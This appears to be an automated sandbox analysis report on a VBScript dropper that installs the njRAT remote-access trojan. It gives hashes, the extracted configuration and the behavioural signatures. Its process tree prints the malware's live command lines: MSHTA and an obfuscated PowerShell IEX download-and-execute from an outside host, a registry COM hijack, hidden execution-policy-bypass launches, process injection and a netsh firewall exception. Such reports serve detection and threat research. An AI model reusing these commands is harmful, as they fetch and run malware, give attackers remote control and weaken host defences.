Analysis
- max time kernel: 144s
- max time network: 153s
- platform: windows10-2004_x64
- resource: win10v2004-20220722-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20220722-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 09-08-2022 19:00
Static task: static1
Behavioral task: behavioral1
- Sample: LIYDOERWQPOKERHAVAXOCI.vbs
- Resource: win7-20220718-en
Behavioral task: behavioral2
- Sample: LIYDOERWQPOKERHAVAXOCI.vbs
- Resource: win10v2004-20220722-en
General
- Target: LIYDOERWQPOKERHAVAXOCI.vbs
- Size: 1KB
- MD5: 733afa01e2447e2fcafcf4f224a1a4a7
- SHA1: fcb94d8e29aa8bb802104a6ea49f7e715bea7031
- SHA256: 00eb25d6c95f74f9c7caded04eca76fa2a03e280448af51c1108b75b2709909a
- SHA512: 42658d2f4cbb0a75c49434644078ad5291995b415481186a66aad1fd31a3013002e6f753093f81c4d8022a7811b199e2b66270c4017a928f6bf9df72d0334948
Malware Config
Extracted
- https://tradeguru.com.pk/enc1
Extracted
- njrat
- 1.9
- HacKed
- Microsoft.Exe
- reg_key: Microsoft.Exe
Signatures
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes: MSHTA.EXE, POWERSHELL.exe, POWERSHELL.exe
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4812 | 3496 | MSHTA.EXE
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2316 | 3496 | POWERSHELL.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2992 | 3496 | POWERSHELL.exe
Blocklisted process makes network request 3 IoCs
Processes: MSHTA.EXE, POWERSHELL.exe
flow | pid | process
16 | 4812 | MSHTA.EXE
18 | 4812 | MSHTA.EXE
24 | 2316 | POWERSHELL.exe
Modifies Windows Firewall 1 TTPs 1 IoCs
Registers COM server for autorun 1 TTPs 2 IoCs
Processes: reg.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | reg.exe
Suspicious use of SetThreadContext 1 IoCs
Processes: powershell.exe
description | pid | process | target process
PID 3520 set thread context of 2380 | 3520 | powershell.exe | aspnet_compiler.exe
Modifies registry class 4 IoCs
Processes: reg.exe, reg.exe
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ | reg.exe
Key created | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | reg.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | reg.exe
Modifies registry key 1 TTPs 2 IoCs
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes: POWERSHELL.exe, powershell.exe, POWERSHELL.exe, powershell.exe
pid | process
2316 | POWERSHELL.exe
2316 | POWERSHELL.exe
2392 | powershell.exe
2392 | powershell.exe
2992 | POWERSHELL.exe
2992 | POWERSHELL.exe
3520 | powershell.exe
3520 | powershell.exe
3520 | powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of WriteProcessMemory 25 IoCs
Processes: POWERSHELL.exe, powershell.exe, POWERSHELL.exe, cmd.exe, cmd.exe, powershell.exe, aspnet_compiler.exe
description | pid | process | target process
PID 2316 wrote to memory of 2392 | 2316 | POWERSHELL.exe | powershell.exe
PID 2316 wrote to memory of 2392 | 2316 | POWERSHELL.exe | powershell.exe
PID 2392 wrote to memory of 2008 | 2392 | powershell.exe | WScript.exe
PID 2392 wrote to memory of 2008 | 2392 | powershell.exe | WScript.exe
PID 2992 wrote to memory of 3052 | 2992 | POWERSHELL.exe | cmd.exe
PID 2992 wrote to memory of 3052 | 2992 | POWERSHELL.exe | cmd.exe
PID 3052 wrote to memory of 2376 | 3052 | cmd.exe | reg.exe
PID 3052 wrote to memory of 2376 | 3052 | cmd.exe | reg.exe
PID 3052 wrote to memory of 4468 | 3052 | cmd.exe | reg.exe
PID 3052 wrote to memory of 4468 | 3052 | cmd.exe | reg.exe
PID 3052 wrote to memory of 4768 | 3052 | cmd.exe | cmd.exe
PID 3052 wrote to memory of 4768 | 3052 | cmd.exe | cmd.exe
PID 4768 wrote to memory of 3520 | 4768 | cmd.exe | powershell.exe
PID 4768 wrote to memory of 3520 | 4768 | cmd.exe | powershell.exe
PID 3520 wrote to memory of 2380 | 3520 | powershell.exe | aspnet_compiler.exe
PID 3520 wrote to memory of 2380 | 3520 | powershell.exe | aspnet_compiler.exe
PID 3520 wrote to memory of 2380 | 3520 | powershell.exe | aspnet_compiler.exe
PID 3520 wrote to memory of 2380 | 3520 | powershell.exe | aspnet_compiler.exe
PID 3520 wrote to memory of 2380 | 3520 | powershell.exe | aspnet_compiler.exe
PID 3520 wrote to memory of 2380 | 3520 | powershell.exe | aspnet_compiler.exe
PID 3520 wrote to memory of 2380 | 3520 | powershell.exe | aspnet_compiler.exe
PID 3520 wrote to memory of 2380 | 3520 | powershell.exe | aspnet_compiler.exe
PID 2380 wrote to memory of 2456 | 2380 | aspnet_compiler.exe | netsh.exe
PID 2380 wrote to memory of 2456 | 2380 | aspnet_compiler.exe | netsh.exe
PID 2380 wrote to memory of 2456 | 2380 | aspnet_compiler.exe | netsh.exe
Processes
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\LIYDOERWQPOKERHAVAXOCI.vbs" 1⤵
-
C:\Windows\system32\MSHTA.EXE
MSHTA.EXE https://tradeguru.com.pk/enc1 1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HFTCVFLOZOSBOCVIDADWLIO = '[#])02!^#13_27<&{+}<&{@y#])02!^#13_27<&{+}<&{@t/##47)<+=%3#+^(*16!&@_\)&!_32%510#])\59(}}17.IO.#])02!^#13_27<&{+}<&{@t)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[\)&!_32%510#])\59(}}17)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[d/##47)<+=%3#+^(*16!&@_)[$76%=_)7%2/8\\5[#!@7]'.Replace('#])02!^#13_27<&{+}<&{@','S').Replace('/##47)<+=%3#+^(*16!&@_','E').Replace(')[$76%=_)7%2/8\\5[#!@7','R').Replace('/{0265}}78<0{&_<$&/3}[','A').Replace('\)&!_32%510#])\59(}}17','M');$HDSRYDZAWTNCWJSVNHKAAWK = ($HFTCVFLOZOSBOCVIDADWLIO -Join '')|&('I'+'EX');$HQNBVPIZRQRPUJTZLAHQUHN = '[2)%@85#]@9@4[_^}^=--4/y2)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@1@)2308@8<[+(\]9}\28_1m.N1@)2308@8<[+(\]9}\28_11{-9)%443833)4=724_<[email protected]@)2308@8<[+(\]9}\28_1bR1@)2308@8<[+(\]9}\28_1qu1@)2308@8<[+(\]9}\28_12)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@]'.Replace('2)%@85#]@9@4[_^}^=--4/','S').Replace('1@)2308@8<[+(\]9}\28_1','E').Replace('1{-9)%443833)4=724_<1@','T');$HJZPGAAEFSGITSRIZPKUQBS = ($HQNBVPIZRQRPUJTZLAHQUHN -Join '')|&('I'+'EX');$HDUYAYRATSZBQJRJZHWQLLX = '[&1\&@*}8\\)_8^[*1)6%\r4]{/3<*/\(-[_}}))}3{14a-=*6\]7}0^-/#54(0*90<04]{/3<*/\(-[_}}))}3{14'.Replace('[&1\&@*}8\\)_8^[*1)6%\','C').Replace('4]{/3<*/\(-[_}}))}3{14','E').Replace('-=*6\]7}0^-/#54(0*90<0','T');$HNIKFEBTGQHWZRRONHNVHCJ = '[}*_2/#{3_]143@]3_-3993=#_^2&^&=4$[-(8[8$tR3=#_^2&^&=4$[-(8[8$ #127#^(&]1(=}8@$!9*56pon2#127#^(&]1(=}8@$!9*563=#_^2&^&=4$[-(8[8$'.Replace('[}*_2/#{3_]143@]3_-399','G').Replace('3=#_^2&^&=4$[-(8[8$','E').Replace('2#127#^(&]1(=}8@$!9*56','S');$HUDDTIGVYNHICUBUGQZNRZL = 
'G#92-1^}48[/]&![(4+{289t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68pon]_7)0}{^)-]<+1)%[51\68#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289am'.Replace(']_7)0}{^)-]<+1)%[51\68','S').Replace('#92-1^}48[/]&![(4+{289','E').Replace('==58=<^5&7<_9/*&}0+&^1','R');$HNSNPLGHWJCBKWXNBDGSZHJ = '2}^0)91!45<5*!)-{[)40-][3\1([^@=-++0=$!8473[a_4@8]2&}\@=9\)7=8$%)-9To][3\1([^@=-++0=$!8473[n_4@8]2&}\@=9\)7=8$%)-9'.Replace('2}^0)91!45<5*!)-{[)40-','R').Replace('][3\1([^@=-++0=$!8473[','E').Replace('_4@8]2&}\@=9\)7=8$%)-9','D');&('I'+'EX')($HDSRYDZAWTNCWJSVNHKAAWK::new($HJZPGAAEFSGITSRIZPKUQBS::$HDUYAYRATSZBQJRJZHWQLLX('https://tradeguru.com.pk/Server1.txt').$HNIKFEBTGQHWZRRONHNVHCJ().$HUDDTIGVYNHICUBUGQZNRZL()).$HNSNPLGHWJCBKWXNBDGSZHJ())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1'" 2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs" 3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
POWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat 1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat"" 2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f 3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exe
REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f 3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.exe
cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'" 3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'" 4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" 5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe
netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE 6⤵
- Modifies Windows Firewall
Downloads
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1 (Filesize: 604KB)
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat (Filesize: 706B)
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1 (Filesize: 3KB)
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs (Filesize: 1KB)
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log (Filesize: 3KB)
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (Filesize: 1KB)
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (Filesize: 1KB)
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (Filesize: 64B)